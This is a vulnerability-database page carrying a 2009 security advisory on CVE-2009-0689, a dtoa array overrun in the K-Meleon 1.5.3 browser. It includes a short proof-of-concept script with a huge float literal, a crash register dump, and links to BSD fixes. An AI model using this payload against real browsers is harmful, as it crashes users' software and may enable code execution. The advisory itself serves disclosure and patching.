Lucene search
K-Meleon 1.5.3 Remote Array Overrun
K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) in lightweight Windows web browse
Show more
| Reporter | Title | Published | Views | Family All 199 |
|---|---|---|---|---|
 | KDE KDELibs 4.3.3 - Remote Array Overrun | 19 Nov 200900:00 | – | exploitpack |
| SeaMonkey 1.1.8 - Remote Array Overrun | 19 Nov 200900:00 | – | exploitpack |
| Opera 10.01 - Remote Array Overrun | 19 Nov 200900:00 | – | exploitpack |
| K-Meleon 1.5.3 - Remote Array Overrun | 19 Nov 200900:00 | – | exploitpack |
| Sunbird 0.9 - Array Overrun Code Execution | 11 Dec 200900:00 | – | exploitpack |
 | Opera 10.01 Remote Array Overrun | 20 Nov 200900:00 | – | packetstorm |
| KDELibs 4.3.3 Remote Array Overrun | 20 Nov 200900:00 | – | packetstorm |
| SeaMonkey 1.1.0 Remote Array Overrun | 20 Nov 200900:00 | – | packetstorm |
| K-Meleon 1.5.3 Remote Array Overrun | 20 Nov 200900:00 | – | packetstorm |
| Matlab R2009b Array Overrun | 9 Jan 201000:00 | – | packetstorm |
10
===================================
K-Meleon 1.5.3 Remote Array Overrun
===================================
# Title: K-Meleon 1.5.3 Remote Array Overrun
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Maksymilian Arciemowicz and sp3x
# Published: 2009-11-19
# Verified: yes
view source
print?
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[ K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- - Dis.: 07.05.2009
- - Pub.: 20.11.2009
CVE: CVE-2009-0689
Risk: High
Remote: Yes
Affected Software:
- - K-Meleon 1.5.3
NOTE: Prior versions may also be affected.
- --- 0.Description ---
K-Meleon is an extremely fast, customizable, lightweight web browser
based on the Gecko layout engine developed by Mozilla which is also used
by Firefox. K-Meleon is free, open source software released under the
GNU General Public License and is designed specifically for Microsoft
Windows (Win32) operating systems.
- --- 1. K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ---
The main problem exist in dtoa implementation. K-Meleon has the same
dtoa as a KDE, Opera and all BSD systems. This issue has been fixed in
Firefox 3.5.4 and fix
http://securityreason.com/achievement_securityalert/63
but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69
We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it
is possible to call 16<= elements of freelist array.
- --- 2. Proof of Concept (PoC) ---
- -----------------------
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
- -----------------------
K-Meleon will crash with
Unhandled exception at 0x01800754 in k-meleon.exe: 0xC0000005: Access
violation reading location 0x0bc576ec.
01800754 mov eax,dword ptr [ecx]
EAX 00000002
ECX 0BC576EC
EDI 028FEB51
- --- 3. SecurityReason Note ---
Officialy SREASONRES:20090625 has been detected in:
- - OpenBSD
- - NetBSD
- - FreeBSD
- - MacOSX
- - Google Chrome
- - Mozilla Firefox
- - Mozilla Seamonkey
- - KDE (example: konqueror)
- - Opera
- - K-Meleon
This list is not yet closed. US-CERT declared that will inform all
vendors about this issue, however, they did not do it. Even greater
confusion caused new CVE number "CVE-2009-1563". Secunia has informed
that this vulnerability was only detected in Mozilla Firefox, but nobody
was aware that the problem affects other products like ( KDE, Chrome )
and it is based on "CVE-2009-0689". After some time Mozilla Foundation
Security Advisory
("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html";)
was updated with note :
"The underlying flaw in the dtoa routines used by Mozilla appears to be
essentially the same as that reported against the libc gdtoa routine by
Maksymilian Arciemowicz ( CVE-2009-0689)".
This fact ( new CVE number for Firefox Vulnerability )and PoC in
javascript (from Secunia), forced us to official notification all other
vendors. We publish all the individual advisories, to formally show all
vulnerable software and to avoid wrong CVE number. We do not see any
other way to fix this issue in all products.
Please note:
Patch used in Firefox 3.5.4 does not fully solve the problem. Dtoa
algorithm is not optimal and allows remote Denial of Service in Firefox
3.5.5 giving long float number.
- --- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h
OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c
# 0day.today [2018-01-26] #Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo19 Nov 2009 00:00Current
7High risk
Vulners AI Score7
EPSS0.96978